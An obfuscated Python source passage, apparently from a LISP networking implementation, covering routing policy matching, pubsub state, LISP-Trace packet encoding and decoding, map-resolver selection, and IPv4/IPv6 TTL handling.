if 7 - 7: o0oOOo0O0Ooo * OoooooooOO - Ii1I * II111iiii % I1Ii111
if 82 - 82: OoOoOO00 - OoOoOO00 + iIii1I11I1II1 + o0oOOo0O0Ooo + IiII - o0oOOo0O0Ooo
def set_bridge_socket ( self , device ) :
I1iiIi111I = socket . socket ( socket . PF_PACKET , socket . SOCK_RAW )
try :
I1iiIi111I = I1iiIi111I . bind ( ( device , 0 ) )
self . bridge_socket = I1iiIi111I
except :
return
if 65 - 65: I1Ii111 + OOooOOo
if 97 - 97: oO0o % OoOoOO00 * oO0o % II111iiii + iIii1I11I1II1
if 11 - 11: ooOoO0o . o0oOOo0O0Ooo
if 94 - 94: ooOoO0o . oO0o * OoooooooOO % oO0o
class lisp_datetime ( object ) :
def __init__ ( self , datetime_str ) :
self . datetime_name = datetime_str
self . datetime = None
self . parse_datetime ( )
if 77 - 77: ooOoO0o % I1IiiI
if 26 - 26: o0oOOo0O0Ooo
def valid_datetime ( self ) :
o0o0OOii1iiii1i1II1 = self . datetime_name
if ( o0o0OOii1iiii1i1II1 . find ( ":" ) == - 1 ) : return ( False )
if ( o0o0OOii1iiii1i1II1 . find ( "-" ) == - 1 ) : return ( False )
oOOOOOo00 , i1O0oOO , OOOO00ooOOo0 , time = o0o0OOii1iiii1i1II1 [ 0 : 4 ] , o0o0OOii1iiii1i1II1 [ 5 : 7 ] , o0o0OOii1iiii1i1II1 [ 8 : 10 ] , o0o0OOii1iiii1i1II1 [ 11 : : ]
if 53 - 53: OoO0O00 / i11iIiiIii . OoooooooOO
if ( ( oOOOOOo00 + i1O0oOO + OOOO00ooOOo0 ) . isdigit ( ) == False ) : return ( False )
if ( i1O0oOO < "01" and i1O0oOO > "12" ) : return ( False )
if ( OOOO00ooOOo0 < "01" and OOOO00ooOOo0 > "31" ) : return ( False )
if 84 - 84: I1ii11iIi11i
I11IiI1 , iIi1 , oooO0OOO0OoO = time . split ( ":" )
if 84 - 84: OoO0O00 . oO0o * OoO0O00 - IiII
if ( ( I11IiI1 + iIi1 + oooO0OOO0OoO ) . isdigit ( ) == False ) : return ( False )
if ( I11IiI1 < "00" and I11IiI1 > "23" ) : return ( False )
if ( iIi1 < "00" and iIi1 > "59" ) : return ( False )
if ( oooO0OOO0OoO < "00" and oooO0OOO0OoO > "59" ) : return ( False )
return ( True )
if 24 - 24: O0 * OOooOOo . OoO0O00 + iII111i + i1IIi + oO0o
if 57 - 57: OOooOOo * OOooOOo
def parse_datetime ( self ) :
oOOoo0o0OOOo = self . datetime_name
oOOoo0o0OOOo = oOOoo0o0OOOo . replace ( "-" , "" )
oOOoo0o0OOOo = oOOoo0o0OOOo . replace ( ":" , "" )
self . datetime = int ( oOOoo0o0OOOo )
if 94 - 94: II111iiii % I1Ii111 . Ii1I / OoOoOO00 - OoO0O00 - OoO0O00
if 13 - 13: I11i + i11iIiiIii . O0 - iII111i
def now ( self ) :
i1 = datetime . datetime . now ( ) . strftime ( "%Y-%m-%d-%H:%M:%S" )
i1 = lisp_datetime ( i1 )
return ( i1 )
if 48 - 48: OoO0O00 * OOooOOo / iII111i
if 90 - 90: I1IiiI * i11iIiiIii . OOooOOo / o0oOOo0O0Ooo
def print_datetime ( self ) :
return ( self . datetime_name )
if 82 - 82: Oo0Ooo
if 50 - 50: I1Ii111 * OOooOOo * OoOoOO00 / OoooooooOO % iII111i
def future ( self ) :
return ( self . datetime > self . now ( ) . datetime )
if 80 - 80: I1Ii111
if 35 - 35: Ii1I . O0 % i11iIiiIii * oO0o - OoooooooOO
def past ( self ) :
return ( self . future ( ) == False )
if 87 - 87: iII111i * ooOoO0o - OOooOOo . O0
if 20 - 20: OoOoOO00 - IiII
def now_in_range ( self , upper ) :
return ( self . past ( ) and upper . future ( ) )
if 9 - 9: O0 . I11i % I1ii11iIi11i * oO0o - I1Ii111 - i1IIi
if 66 - 66: II111iiii / Oo0Ooo
def this_year ( self ) :
O000oo = str ( self . now ( ) . datetime ) [ 0 : 4 ]
i1 = str ( self . datetime ) [ 0 : 4 ]
return ( i1 == O000oo )
if 45 - 45: IiII + I1IiiI * I1Ii111
if 82 - 82: OOooOOo / I11i % Ii1I * OoOoOO00
def this_month ( self ) :
O000oo = str ( self . now ( ) . datetime ) [ 0 : 6 ]
i1 = str ( self . datetime ) [ 0 : 6 ]
return ( i1 == O000oo )
if 88 - 88: o0oOOo0O0Ooo % OoO0O00
if 30 - 30: II111iiii / Oo0Ooo % Oo0Ooo + O0 / iIii1I11I1II1 . OoO0O00
def today ( self ) :
O000oo = str ( self . now ( ) . datetime ) [ 0 : 8 ]
i1 = str ( self . datetime ) [ 0 : 8 ]
return ( i1 == O000oo )
if 43 - 43: I1IiiI % OoOoOO00 * O0 + o0oOOo0O0Ooo
if 97 - 97: iIii1I11I1II1 + O0
if 41 - 41: OoOoOO00 - II111iiii
if 46 - 46: OOooOOo
if 73 - 73: iII111i - IiII + II111iiii
if 58 - 58: Oo0Ooo % I1IiiI
class lisp_policy_match ( object ) :
def __init__ ( self ) :
self . source_eid = None
self . dest_eid = None
self . source_rloc = None
self . dest_rloc = None
self . rloc_record_name = None
self . geo_name = None
self . elp_name = None
self . rle_name = None
self . json_name = None
self . datetime_lower = None
self . datetime_upper = None
if 78 - 78: iII111i / iIii1I11I1II1 * IiII . ooOoO0o / I1Ii111 % I11i
if 14 - 14: II111iiii % iIii1I11I1II1 - I1IiiI % i11iIiiIii . OOooOOo * I1ii11iIi11i
class lisp_policy ( object ) :
def __init__ ( self , policy_name ) :
self . policy_name = policy_name
self . match_clauses = [ ]
self . set_action = None
self . set_record_ttl = None
self . set_source_eid = None
self . set_dest_eid = None
self . set_rloc_address = None
self . set_rloc_record_name = None
self . set_geo_name = None
self . set_elp_name = None
self . set_rle_name = None
self . set_json_name = None
if 12 - 12: I1ii11iIi11i % I1ii11iIi11i . OoO0O00 . OoOoOO00
if 73 - 73: I1ii11iIi11i * i1IIi * Oo0Ooo / O0
def match_policy_map_request ( self , mr , srloc ) :
for IiIIIIi11ii in self . match_clauses :
o00oo = IiIIIIi11ii . source_eid
Ii1I111Ii = mr . source_eid
if ( o00oo and Ii1I111Ii and Ii1I111Ii . is_more_specific ( o00oo ) == False ) : continue
if 1 - 1: iII111i * OOooOOo + II111iiii / Ii1I . I1ii11iIi11i
o00oo = IiIIIIi11ii . dest_eid
Ii1I111Ii = mr . target_eid
if ( o00oo and Ii1I111Ii and Ii1I111Ii . is_more_specific ( o00oo ) == False ) : continue
if 61 - 61: oO0o % OoOoOO00 % ooOoO0o . I1Ii111 / OoO0O00
o00oo = IiIIIIi11ii . source_rloc
Ii1I111Ii = srloc
if ( o00oo and Ii1I111Ii and Ii1I111Ii . is_more_specific ( o00oo ) == False ) : continue
i1IIiI1iII = IiIIIIi11ii . datetime_lower
ii11IIiI1iIi = IiIIIIi11ii . datetime_upper
if ( i1IIiI1iII and ii11IIiI1iIi and i1IIiI1iII . now_in_range ( ii11IIiI1iIi ) == False ) : continue
return ( True )
if 81 - 81: II111iiii - II111iiii * o0oOOo0O0Ooo
return ( False )
if 95 - 95: I1Ii111 - OoooooooOO
if 99 - 99: OoooooooOO % IiII . I11i + OoooooooOO
def set_policy_map_reply ( self ) :
o00ooI11 = ( self . set_rloc_address == None and
self . set_rloc_record_name == None and self . set_geo_name == None and
self . set_elp_name == None and self . set_rle_name == None )
if ( o00ooI11 ) : return ( None )
if 8 - 8: IiII / I11i * oO0o
OooOOoOO0OO = lisp_rloc ( )
if ( self . set_rloc_address ) :
OooOOoOO0OO . rloc . copy_address ( self . set_rloc_address )
oOOOo0o = OooOOoOO0OO . rloc . print_address_no_iid ( )
lprint ( "Policy set-rloc-address to {}" . format ( oOOOo0o ) )
if 4 - 4: IiII + ooOoO0o
if ( self . set_rloc_record_name ) :
OooOOoOO0OO . rloc_name = self . set_rloc_record_name
ooO0o = blue ( OooOOoOO0OO . rloc_name , False )
lprint ( "Policy set-rloc-record-name to {}" . format ( ooO0o ) )
if 39 - 39: II111iiii + II111iiii + I1Ii111 % Ii1I % OoOoOO00 . oO0o
if ( self . set_geo_name ) :
OooOOoOO0OO . geo_name = self . set_geo_name
ooO0o = OooOOoOO0OO . geo_name
IIi1Ii1 = "" if ( ooO0o in lisp_geo_list ) else "(not configured)"
if 16 - 16: Oo0Ooo . OoOoOO00 * I11i
lprint ( "Policy set-geo-name '{}' {}" . format ( ooO0o , IIi1Ii1 ) )
if 47 - 47: Ii1I / ooOoO0o . i11iIiiIii / IiII . Oo0Ooo
if ( self . set_elp_name ) :
OooOOoOO0OO . elp_name = self . set_elp_name
ooO0o = OooOOoOO0OO . elp_name
IIi1Ii1 = "" if ( ooO0o in lisp_elp_list ) else "(not configured)"
if 25 - 25: OoooooooOO
lprint ( "Policy set-elp-name '{}' {}" . format ( ooO0o , IIi1Ii1 ) )
if 39 - 39: oO0o * I1Ii111 % OoOoOO00 % oO0o
if ( self . set_rle_name ) :
OooOOoOO0OO . rle_name = self . set_rle_name
ooO0o = OooOOoOO0OO . rle_name
IIi1Ii1 = "" if ( ooO0o in lisp_rle_list ) else "(not configured)"
if 87 - 87: i1IIi % ooOoO0o + Ii1I + I11i % OoOoOO00
lprint ( "Policy set-rle-name '{}' {}" . format ( ooO0o , IIi1Ii1 ) )
if 11 - 11: OoO0O00 * OoO0O00 * O0
if ( self . set_json_name ) :
OooOOoOO0OO . json_name = self . set_json_name
ooO0o = OooOOoOO0OO . json_name
IIi1Ii1 = "" if ( ooO0o in lisp_json_list ) else "(not configured)"
if 18 - 18: II111iiii . o0oOOo0O0Ooo + OoO0O00
lprint ( "Policy set-json-name '{}' {}" . format ( ooO0o , IIi1Ii1 ) )
if 69 - 69: OoO0O00 . ooOoO0o * ooOoO0o * iIii1I11I1II1
return ( OooOOoOO0OO )
if 8 - 8: iII111i . oO0o . OOooOOo + iII111i . Ii1I
if 46 - 46: OoO0O00
def save_policy ( self ) :
lisp_policies [ self . policy_name ] = self
if 21 - 21: iIii1I11I1II1 - iII111i
if 15 - 15: O0 + iII111i + i11iIiiIii
if 31 - 31: iIii1I11I1II1 * iIii1I11I1II1 . I11i
class lisp_pubsub ( object ) :
def __init__ ( self , itr , port , nonce , ttl , xtr_id ) :
self . itr = itr
self . port = port
self . nonce = nonce
self . uptime = lisp_get_timestamp ( )
self . ttl = ttl
self . xtr_id = xtr_id
self . map_notify_count = 0
self . eid_prefix = None
if 52 - 52: i11iIiiIii / oO0o / IiII
if 84 - 84: I11i . oO0o + ooOoO0o
def add ( self , eid_prefix ) :
self . eid_prefix = eid_prefix
O0O00O = self . ttl
I11I = eid_prefix . print_prefix ( )
if ( I11I not in lisp_pubsub_cache ) :
lisp_pubsub_cache [ I11I ] = { }
if 75 - 75: I1Ii111
iIiI1IIi1Ii1i = lisp_pubsub_cache [ I11I ]
if 97 - 97: ooOoO0o % Oo0Ooo . o0oOOo0O0Ooo
IiI1III1ii = "Add"
if ( self . xtr_id in iIiI1IIi1Ii1i ) :
IiI1III1ii = "Replace"
del ( iIiI1IIi1Ii1i [ self . xtr_id ] )
if 9 - 9: Oo0Ooo % I1ii11iIi11i * iIii1I11I1II1 . OoOoOO00 % I1IiiI
iIiI1IIi1Ii1i [ self . xtr_id ] = self
if 66 - 66: Ii1I - ooOoO0o % OoO0O00
I11I = green ( I11I , False )
I1IoOO0oOOOOO0 = red ( self . itr . print_address_no_iid ( ) , False )
oOOoO = "0x" + lisp_hex_string ( self . xtr_id )
lprint ( "{} pubsub state {} for {}, xtr-id: {}, ttl {}" . format ( IiI1III1ii , I11I ,
I1IoOO0oOOOOO0 , oOOoO , O0O00O ) )
if 63 - 63: OoooooooOO * iII111i % ooOoO0o
if 17 - 17: OoO0O00 % II111iiii . i1IIi . OOooOOo
def delete ( self , eid_prefix ) :
I11I = eid_prefix . print_prefix ( )
I1IoOO0oOOOOO0 = red ( self . itr . print_address_no_iid ( ) , False )
oOOoO = "0x" + lisp_hex_string ( self . xtr_id )
if ( I11I in lisp_pubsub_cache ) :
iIiI1IIi1Ii1i = lisp_pubsub_cache [ I11I ]
if ( self . xtr_id in iIiI1IIi1Ii1i ) :
iIiI1IIi1Ii1i . pop ( self . xtr_id )
lprint ( "Remove pubsub state {} for {}, xtr-id: {}" . format ( I11I ,
I1IoOO0oOOOOO0 , oOOoO ) )
if 49 - 49: II111iiii / OoOoOO00 * IiII % OoO0O00
if 77 - 77: OoOoOO00 + OOooOOo % o0oOOo0O0Ooo
if 3 - 3: ooOoO0o / i1IIi
if 71 - 71: Ii1I + oO0o % IiII
if 15 - 15: ooOoO0o . Oo0Ooo
if 42 - 42: OOooOOo . i11iIiiIii % O0 - OoO0O00
if 34 - 34: OOooOOo % oO0o * OOooOOo * iIii1I11I1II1
if 18 - 18: I1IiiI / I11i
if 64 - 64: I11i * i11iIiiIii
if 16 - 16: I1Ii111 * II111iiii * I1Ii111 . o0oOOo0O0Ooo
if 96 - 96: ooOoO0o - o0oOOo0O0Ooo % O0 * Ii1I . OoOoOO00
if 80 - 80: I1IiiI
if 31 - 31: I1Ii111 + o0oOOo0O0Ooo . I1IiiI + I11i . oO0o
if 50 - 50: Ii1I . OOooOOo
if 84 - 84: OoOoOO00 * OoO0O00 + I1IiiI
if 38 - 38: OoooooooOO % I1IiiI
if 80 - 80: iII111i / O0 % OoooooooOO / Oo0Ooo
if 75 - 75: ooOoO0o
if 72 - 72: oO0o . OoooooooOO % ooOoO0o % OoO0O00 * oO0o * OoO0O00
if 14 - 14: I11i / I11i
if 90 - 90: O0 * OOooOOo / oO0o . Oo0Ooo * I11i
if 93 - 93: oO0o / ooOoO0o - I1Ii111
class lisp_trace ( object ) :
def __init__ ( self ) :
self . nonce = lisp_get_control_nonce ( )
self . packet_json = [ ]
self . local_rloc = None
self . local_port = None
self . lisp_socket = None
if 70 - 70: OOooOOo / Ii1I - ooOoO0o + OoooooooOO / OoO0O00 - i11iIiiIii
if 26 - 26: O0 + Oo0Ooo
def print_trace ( self ) :
ooo0 = self . packet_json
lprint ( "LISP-Trace JSON: '{}'" . format ( ooo0 ) )
if 30 - 30: IiII
if 6 - 6: O0
def encode ( self ) :
oOOOoOO = socket . htonl ( 0x90000000 )
OO0Oo00OO0oo = struct . pack ( "II" , oOOOoOO , 0 )
OO0Oo00OO0oo += struct . pack ( "Q" , self . nonce )
OO0Oo00OO0oo += json . dumps ( self . packet_json )
return ( OO0Oo00OO0oo )
if 92 - 92: I11i
if 76 - 76: I11i / iIii1I11I1II1 - i11iIiiIii / O0 / O0
def decode ( self , packet ) :
Iii1iIII1Iii = "I"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( False )
oOOOoOO = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
oOOOoOO = socket . ntohl ( oOOOoOO )
if ( ( oOOOoOO & 0xff000000 ) != 0x90000000 ) : return ( False )
if 19 - 19: Ii1I . I1IiiI - i1IIi * ooOoO0o . iIii1I11I1II1
if ( len ( packet ) < oOoOo000Ooooo ) : return ( False )
oOOOo0o = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
if 87 - 87: ooOoO0o % I1ii11iIi11i . I1IiiI
oOOOo0o = socket . ntohl ( oOOOo0o )
I11iiI1i11I = oOOOo0o >> 24
iIio0O0O0Ooo0o = ( oOOOo0o >> 16 ) & 0xff
oO0o0 = ( oOOOo0o >> 8 ) & 0xff
OOO0O00oo = oOOOo0o & 0xff
self . local_rloc = "{}.{}.{}.{}" . format ( I11iiI1i11I , iIio0O0O0Ooo0o , oO0o0 , OOO0O00oo )
self . local_port = str ( oOOOoOO & 0xffff )
if 62 - 62: oO0o / Oo0Ooo / IiII + I11i * ooOoO0o
Iii1iIII1Iii = "Q"
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( False )
self . nonce = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] ) [ 0 ]
packet = packet [ oOoOo000Ooooo : : ]
if ( len ( packet ) == 0 ) : return ( True )
if 84 - 84: ooOoO0o + OoOoOO00 * I1ii11iIi11i % OoooooooOO . O0
try :
self . packet_json = json . loads ( packet )
except :
return ( False )
if 27 - 27: OoO0O00 * OoooooooOO - II111iiii / o0oOOo0O0Ooo
return ( True )
if 76 - 76: I11i % I1Ii111 % iII111i + IiII * iII111i + OoOoOO00
if 83 - 83: OOooOOo . ooOoO0o / IiII
def myeid ( self , eid ) :
return ( lisp_is_myeid ( eid ) )
if 80 - 80: I1Ii111 . I11i - I11i + I1ii11iIi11i
if 42 - 42: I11i / IiII % O0 - Oo0Ooo
def return_to_sender ( self , lisp_socket , rts_rloc , packet ) :
OooOOoOO0OO , O00oo0o0o0oo = self . rtr_cache_nat_trace_find ( rts_rloc )
if ( OooOOoOO0OO == None ) :
OooOOoOO0OO , O00oo0o0o0oo = rts_rloc . split ( ":" )
O00oo0o0o0oo = int ( O00oo0o0o0oo )
lprint ( "Send LISP-Trace to address {}:{}" . format ( OooOOoOO0OO , O00oo0o0o0oo ) )
else :
lprint ( "Send LISP-Trace to translated address {}:{}" . format ( OooOOoOO0OO ,
O00oo0o0o0oo ) )
if 33 - 33: I1Ii111
if 1 - 1: IiII - iIii1I11I1II1 % OoooooooOO
if ( lisp_socket == None ) :
I1iiIi111I = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
I1iiIi111I . bind ( ( "0.0.0.0" , LISP_TRACE_PORT ) )
I1iiIi111I . sendto ( packet , ( OooOOoOO0OO , O00oo0o0o0oo ) )
I1iiIi111I . close ( )
else :
lisp_socket . sendto ( packet , ( OooOOoOO0OO , O00oo0o0o0oo ) )
if 1 - 1: o0oOOo0O0Ooo - i11iIiiIii + I11i
if 47 - 47: O0 + IiII + ooOoO0o + OOooOOo / OoOoOO00
if 31 - 31: oO0o * iII111i % OoOoOO00
def packet_length ( self ) :
Ii1iiI1 = 8 ; O00Oo00ooO = 4 + 4 + 8
return ( Ii1iiI1 + O00Oo00ooO + len ( json . dumps ( self . packet_json ) ) )
if 99 - 99: i1IIi . iII111i . iII111i
if 77 - 77: OOooOOo
def rtr_cache_nat_trace ( self , translated_rloc , translated_port ) :
III11II111 = self . local_rloc + ":" + self . local_port
iiIiII11i1 = ( translated_rloc , translated_port )
lisp_rtr_nat_trace_cache [ III11II111 ] = iiIiII11i1
lprint ( "Cache NAT Trace addresses {} -> {}" . format ( III11II111 , iiIiII11i1 ) )
if 74 - 74: O0
if 86 - 86: OoOoOO00
def rtr_cache_nat_trace_find ( self , local_rloc_and_port ) :
III11II111 = local_rloc_and_port
try : iiIiII11i1 = lisp_rtr_nat_trace_cache [ III11II111 ]
except : iiIiII11i1 = ( None , None )
return ( iiIiII11i1 )
if 4 - 4: OoooooooOO * OoO0O00
if 93 - 93: OoO0O00 - I1Ii111 - OoO0O00
if 1 - 1: o0oOOo0O0Ooo . oO0o * i11iIiiIii * IiII - OoO0O00 - OoooooooOO
if 29 - 29: iIii1I11I1II1 + OoO0O00 * II111iiii * Ii1I * iII111i . O0
if 6 - 6: I1IiiI - OoOoOO00
if 63 - 63: OOooOOo - oO0o * I1IiiI
if 60 - 60: II111iiii - Oo0Ooo
if 43 - 43: I1IiiI - IiII - OOooOOo
if 19 - 19: I1Ii111 / I1Ii111 - i1IIi
if 99 - 99: O0
if 37 - 37: iIii1I11I1II1 / I1Ii111 + OoO0O00
def lisp_get_map_server ( address ) :
for OoOoO in list ( lisp_map_servers_list . values ( ) ) :
if ( OoOoO . map_server . is_exact_match ( address ) ) : return ( OoOoO )
if 85 - 85: ooOoO0o / I1IiiI
return ( None )
if 7 - 7: Oo0Ooo - iIii1I11I1II1 / I1ii11iIi11i * I1IiiI + Ii1I
if 99 - 99: i11iIiiIii - I1ii11iIi11i
if 64 - 64: IiII . OoOoOO00 . Oo0Ooo . I1Ii111 / I11i / Ii1I
if 95 - 95: iIii1I11I1II1 . Ii1I % oO0o - I11i % IiII
if 42 - 42: OoOoOO00 + oO0o * i1IIi + i11iIiiIii
if 25 - 25: Ii1I - Ii1I - I1ii11iIi11i / i1IIi . OoOoOO00 % Oo0Ooo
if 76 - 76: I1Ii111 / OoOoOO00
def lisp_get_any_map_server ( ) :
for OoOoO in list ( lisp_map_servers_list . values ( ) ) : return ( OoOoO )
return ( None )
if 61 - 61: Oo0Ooo . i1IIi
if 78 - 78: i11iIiiIii
if 20 - 20: Ii1I
if 100 - 100: OoooooooOO . I1Ii111
if 32 - 32: iIii1I11I1II1 . iIii1I11I1II1 % II111iiii / Oo0Ooo . iIii1I11I1II1 . O0
if 63 - 63: I1IiiI . iIii1I11I1II1 . Oo0Ooo % OOooOOo - iII111i + ooOoO0o
if 64 - 64: o0oOOo0O0Ooo / Ii1I % I1Ii111 % iII111i + OOooOOo * IiII
if 87 - 87: I1ii11iIi11i . i1IIi - I11i + OoOoOO00 . O0
if 37 - 37: IiII
if 65 - 65: ooOoO0o * Ii1I / I1IiiI . i1IIi % ooOoO0o . OoooooooOO
def lisp_get_map_resolver ( address , eid ) :
if ( address != None ) :
oOOOo0o = address . print_address ( )
iii1i = None
for III11II111 in lisp_map_resolvers_list :
if ( III11II111 . find ( oOOOo0o ) == - 1 ) : continue
iii1i = lisp_map_resolvers_list [ III11II111 ]
if 17 - 17: ooOoO0o / OoO0O00 / I1IiiI / OOooOOo % IiII
return ( iii1i )
if 88 - 88: i1IIi - OoOoOO00
if 66 - 66: OoooooooOO - OoooooooOO * I11i / II111iiii + oO0o / Ii1I
if 7 - 7: Ii1I / iIii1I11I1II1
if 36 - 36: iIii1I11I1II1 % i11iIiiIii
if 35 - 35: Oo0Ooo + I1IiiI - O0 - I1Ii111
if 64 - 64: i1IIi * OoOoOO00 / II111iiii * oO0o
if 35 - 35: i1IIi - Ii1I - Ii1I . O0 % iII111i * iII111i
if ( eid == "" ) :
IiO00 = ""
elif ( eid == None ) :
IiO00 = "all"
else :
II1II1Iii1I = lisp_db_for_lookups . lookup_cache ( eid , False )
IiO00 = "all" if II1II1Iii1I == None else II1II1Iii1I . use_mr_name
if 97 - 97: Oo0Ooo + Ii1I . iII111i + i11iIiiIii . OOooOOo % o0oOOo0O0Ooo
if 82 - 82: OoO0O00 . I1Ii111
IiIIIII1IIi11 = None
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
if ( IiO00 == "" ) : return ( iii1i )
if ( iii1i . mr_name != IiO00 ) : continue
if ( IiIIIII1IIi11 == None or iii1i . last_used < IiIIIII1IIi11 . last_used ) : IiIIIII1IIi11 = iii1i
if 81 - 81: I1Ii111 . I1IiiI + O0 * oO0o * Oo0Ooo * iIii1I11I1II1
return ( IiIIIII1IIi11 )
if 88 - 88: ooOoO0o * Ii1I + II111iiii - OoO0O00 % Oo0Ooo
if 94 - 94: i11iIiiIii * I1ii11iIi11i / OoOoOO00 + i1IIi
if 37 - 37: OOooOOo + O0 - OoOoOO00 + OoO0O00
if 13 - 13: i11iIiiIii * oO0o
if 41 - 41: ooOoO0o
if 89 - 89: i11iIiiIii . i11iIiiIii . IiII
if 29 - 29: o0oOOo0O0Ooo * iIii1I11I1II1 . iIii1I11I1II1
if 32 - 32: IiII - OoOoOO00
def lisp_get_decent_map_resolver ( eid ) :
OOOooo0OooOoO = lisp_get_decent_index ( eid )
OOOo0oOO = str ( OOOooo0OooOoO ) + "." + lisp_decent_dns_suffix
if 70 - 70: OOooOOo * IiII * iII111i
lprint ( "Use LISP-Decent map-resolver {} for EID {}" . format ( bold ( OOOo0oOO , False ) , eid . print_prefix ( ) ) )
if 45 - 45: iII111i * i11iIiiIii - IiII + I1ii11iIi11i % I1ii11iIi11i
if 26 - 26: i11iIiiIii + ooOoO0o / OoOoOO00
IiIIIII1IIi11 = None
for iii1i in list ( lisp_map_resolvers_list . values ( ) ) :
if ( OOOo0oOO != iii1i . dns_name ) : continue
if ( IiIIIII1IIi11 == None or iii1i . last_used < IiIIIII1IIi11 . last_used ) : IiIIIII1IIi11 = iii1i
if 15 - 15: II111iiii - IiII
return ( IiIIIII1IIi11 )
if 74 - 74: i1IIi * OoooooooOO . Oo0Ooo . I1IiiI / o0oOOo0O0Ooo . OoOoOO00
if 50 - 50: I1ii11iIi11i / iIii1I11I1II1 - Oo0Ooo - i11iIiiIii % o0oOOo0O0Ooo - ooOoO0o
if 92 - 92: OoooooooOO - I1ii11iIi11i . I11i / O0 % iII111i
if 96 - 96: I1IiiI . oO0o % O0
if 19 - 19: iIii1I11I1II1 + I1Ii111 / OoooooooOO % OOooOOo - i1IIi + I11i
if 87 - 87: OoooooooOO
if 97 - 97: ooOoO0o * IiII / iIii1I11I1II1
def lisp_ipv4_input ( packet ) :
if 65 - 65: i1IIi - i11iIiiIii + oO0o % I1IiiI - OoO0O00 % ooOoO0o
if 23 - 23: o0oOOo0O0Ooo . o0oOOo0O0Ooo - iIii1I11I1II1 / o0oOOo0O0Ooo
if 65 - 65: I1Ii111 + I1Ii111 . I1ii11iIi11i . OoOoOO00 % o0oOOo0O0Ooo * o0oOOo0O0Ooo
if 2 - 2: oO0o % iII111i + I1ii11iIi11i / II111iiii * I1ii11iIi11i
if ( ord ( packet [ 9 : 10 ] ) == 2 ) : return ( [ True , packet ] )
if 45 - 45: II111iiii . iII111i
if 55 - 55: ooOoO0o / iII111i / O0
if 98 - 98: O0 % iII111i + II111iiii
if 13 - 13: I1IiiI * oO0o - o0oOOo0O0Ooo
OOOoOOo0o = struct . unpack ( "H" , packet [ 10 : 12 ] ) [ 0 ]
if ( OOOoOOo0o == 0 ) :
dprint ( "Packet arrived with checksum of 0!" )
else :
packet = lisp_ip_checksum ( packet )
OOOoOOo0o = struct . unpack ( "H" , packet [ 10 : 12 ] ) [ 0 ]
if ( OOOoOOo0o != 0 ) :
dprint ( "IPv4 header checksum failed for inner header" )
packet = lisp_format_packet ( packet [ 0 : 20 ] )
dprint ( "Packet header: {}" . format ( packet ) )
return ( [ False , None ] )
if 23 - 23: iIii1I11I1II1 + oO0o . oO0o / o0oOOo0O0Ooo
if 77 - 77: i1IIi * o0oOOo0O0Ooo * IiII
if 24 - 24: i11iIiiIii / iIii1I11I1II1 / iII111i
if 31 - 31: OOooOOo . iIii1I11I1II1 - oO0o
if 36 - 36: O0
if 30 - 30: i11iIiiIii * Oo0Ooo . IiII
if 65 - 65: oO0o * IiII * OOooOOo / OoooooooOO % I11i / I1Ii111
O0O00O = struct . unpack ( "B" , packet [ 8 : 9 ] ) [ 0 ]
if ( O0O00O == 0 ) :
dprint ( "IPv4 packet arrived with ttl 0, packet discarded" )
return ( [ False , None ] )
elif ( O0O00O == 1 ) :
dprint ( "IPv4 packet {}, packet discarded" . format ( bold ( "ttl expiry" , False ) ) )
if 21 - 21: i1IIi * iII111i + OoO0O00
return ( [ False , None ] )
if 27 - 27: I11i / oO0o . iII111i + o0oOOo0O0Ooo - OOooOOo
if 85 - 85: OoooooooOO
O0O00O -= 1
packet = packet [ 0 : 8 ] + struct . pack ( "B" , O0O00O ) + packet [ 9 : : ]
packet = packet [ 0 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : : ]
packet = lisp_ip_checksum ( packet )
return ( [ False , packet ] )
if 83 - 83: iII111i * I11i . OOooOOo - OoO0O00 % IiII
if 8 - 8: I1Ii111
if 86 - 86: ooOoO0o + iII111i * O0 % OoO0O00 + OoOoOO00
if 49 - 49: OOooOOo / i1IIi - II111iiii . iIii1I11I1II1 + I11i . OOooOOo
if 9 - 9: iIii1I11I1II1 + Ii1I + I11i
if 96 - 96: OoO0O00 + i11iIiiIii + OoO0O00
if 7 - 7: i1IIi . I1IiiI
def lisp_ipv6_input ( packet ) :
OooOOooo = packet . inner_dest
packet = packet . packet
if 68 - 68: OoooooooOO
if 91 - 91: IiII . ooOoO0o * I11i
if 39 - 39: o0oOOo0O0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 . II111iiii
if 36 - 36: I1IiiI * i1IIi + OoOoOO00
O0O00O = struct . unpack ( "B" , packet [ 7 : 8 ] ) [ 0 ]
if ( O0O00O == 0 ) :
dprint ( "IPv6 packet arrived with hop-limit 0, packet discarded" )
return ( None )
elif ( O0O00O == 1 ) :
dprint ( "IPv6 packet {}, packet discarded" . format ( bold ( "ttl expiry" , False ) ) )
if 63 - 63: OoOoOO00 - iII111i
return ( None )
if 83 - 83: i1IIi / iII111i % ooOoO0o % i11iIiiIii + I1ii11iIi11i
if 82 - 82: iIii1I11I1II1 / OOooOOo
if 7 - 7: OoooooooOO
if 71 - 71: OOooOOo * Oo0Ooo . Oo0Ooo % iIii1I11I1II1
if 56 - 56: IiII * iIii1I11I1II1 - iIii1I11I1II1 . O0
if ( OooOOooo . is_ipv6_link_local ( ) ) :
dprint ( "Do not encapsulate IPv6 link-local packets" )
return ( None )
if 56 - 56: I1Ii111 / iIii1I11I1II1 % IiII * iIii1I11I1II1 . I1ii11iIi11i . OOooOOo
if 1 - 1: Ii1I . Ii1I % II111iiii + I11i + OoOoOO00
O0O00O -= 1
packet = packet [ 0 : 7 ] + struct . pack ( "B" , O0O00O ) + packet [ 8 : : ]
return ( packet )
if 52 - 52: OoooooooOO - OoO0O00
if 24 - 24: iII111i / Oo0Ooo - I1ii11iIi11i + o0oOOo0O0Ooo
if 44 - 44: OoOoOO00 + I1IiiI . I1ii11iIi11i / i1IIi + II111iiii . Oo0Ooo
if 39 - 39: o0oOOo0O0Ooo
if 64 - 64: oO0o - i11iIiiIii
